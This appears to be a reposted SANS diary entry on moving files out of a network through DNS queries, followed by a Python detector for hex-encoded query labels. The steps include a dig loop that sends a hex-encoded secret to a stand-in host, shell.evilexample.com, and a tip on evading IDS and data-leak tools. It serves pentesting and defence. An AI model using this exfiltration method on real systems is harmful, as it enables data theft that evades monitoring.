Here is an FTDNS example (File Transfer via DNS) from Johannes B. Ullrich, Ph.D. (http://isc.sans.edu/diary.html?storyid=10306):
File transfer via DNS
For pentesters, this is helpful as it will first of all sneak past many firewalls, and secondly you do not need to install any special tools that may be picked up by anti-malware.
First, we convert the file to be transferred via xxd into a hex stream.
xxd -p secret > file.hex
Next, we read each line from file.hex, and “transmit” it as a DNS query.
for b in `cat file.hex `; do dig $b.shell.evilexample.com; done
This does not need special privileges. On the DNS server, we can capture the messages via tcpdump or the query log.
tcpdump -w /tmp/dns -s0 port 53 and host system.example.com
Then, we extract the messages from the packet capture
tcpdump -r /tmp/dns -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > received.txt
The “uniq” may not be necessary, but I find that the DNS messages may be resent once in a while if the response isn’t fast enough.
Finally, just reverse the hex encoding:
xxd -r -p < received.txt > keys.pgp
And you are done! FTDNS (File Transfer via DNS) without installing any special tools on “system.example.com”.
Bonus: shorter lines from xxd and maybe a quick xor may make it even harder for an IDS/Data Leakage system to “see” this kind of data.
Defense: Watch your DNS logs!
[1] http://www.packetstan.com/2010/11/packet-payloads-encryption-and-bacon.html
[2] http://sans.edu/student-files/presentations/ftp_nslookup_withnotes.pdf
——
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
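As an added defender-side example (not code from the diary above), here is a Python heuristic that scans a query-log listing for the footprint this technique leaves: many distinct, long, hex-only leading labels under one parent zone. The simplified “client qname qtype” log format, the sample lines and the thresholds are assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed sample log lines in an assumed "<client> <qname> <qtype>" format,
# standing in for a BIND query log or a tcpdump-derived listing. The long labels
# are 60 hex characters, the width xxd -p emits per line. One line is repeated
# to mimic the retransmissions the diary mentions.
SAMPLE_LOG = """\
10.0.0.5 www.example.com A
10.0.0.5 0123456789abcdef0123456789abcdef0123456789abcdef0123456789ab.shell.evilexample.com A
10.0.0.5 fedcba9876543210fedcba9876543210fedcba9876543210fedcba987654.shell.evilexample.com A
10.0.0.5 fedcba9876543210fedcba9876543210fedcba9876543210fedcba987654.shell.evilexample.com A
10.0.0.5 mail.example.com MX
10.0.0.5 a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4e5f60718293a4b5c6d7e.shell.evilexample.com A
10.0.0.9 cdn.example.net A
"""

HEX_LABEL = re.compile(r"^[0-9a-f]+$")


def parse_qnames(log_text):
    """Yield (client, qname) pairs from the assumed log format."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) >= 2:
            yield parts[0], parts[1].rstrip(".").lower()


def split_name(qname):
    """Return (leading_label, parent_zone) for a query name."""
    first, _, parent = qname.partition(".")
    return first, parent


def find_hex_tunnel_zones(log_text, min_label_len=40, min_labels=3):
    """Group queries by parent zone and count the DISTINCT leading labels that
    are long and purely hexadecimal (so retransmits do not inflate the count).
    Return {parent_zone: distinct_label_count} for zones at or above min_labels."""
    labels_by_zone = defaultdict(set)
    for _client, qname in parse_qnames(log_text):
        label, parent = split_name(qname)
        if parent and len(label) >= min_label_len and HEX_LABEL.match(label):
            labels_by_zone[parent].add(label)
    return {zone: len(s) for zone, s in labels_by_zone.items() if len(s) >= min_labels}


if __name__ == "__main__":
    for zone, n in find_hex_tunnel_zones(SAMPLE_LOG).items():
        print(f"suspicious zone {zone}: {n} distinct long hex labels")
```

Tune min_label_len and min_labels to your environment; short hex-looking hostnames (CDN hashes, cache busters) are common and sit well under the 60-character width this encoding produces.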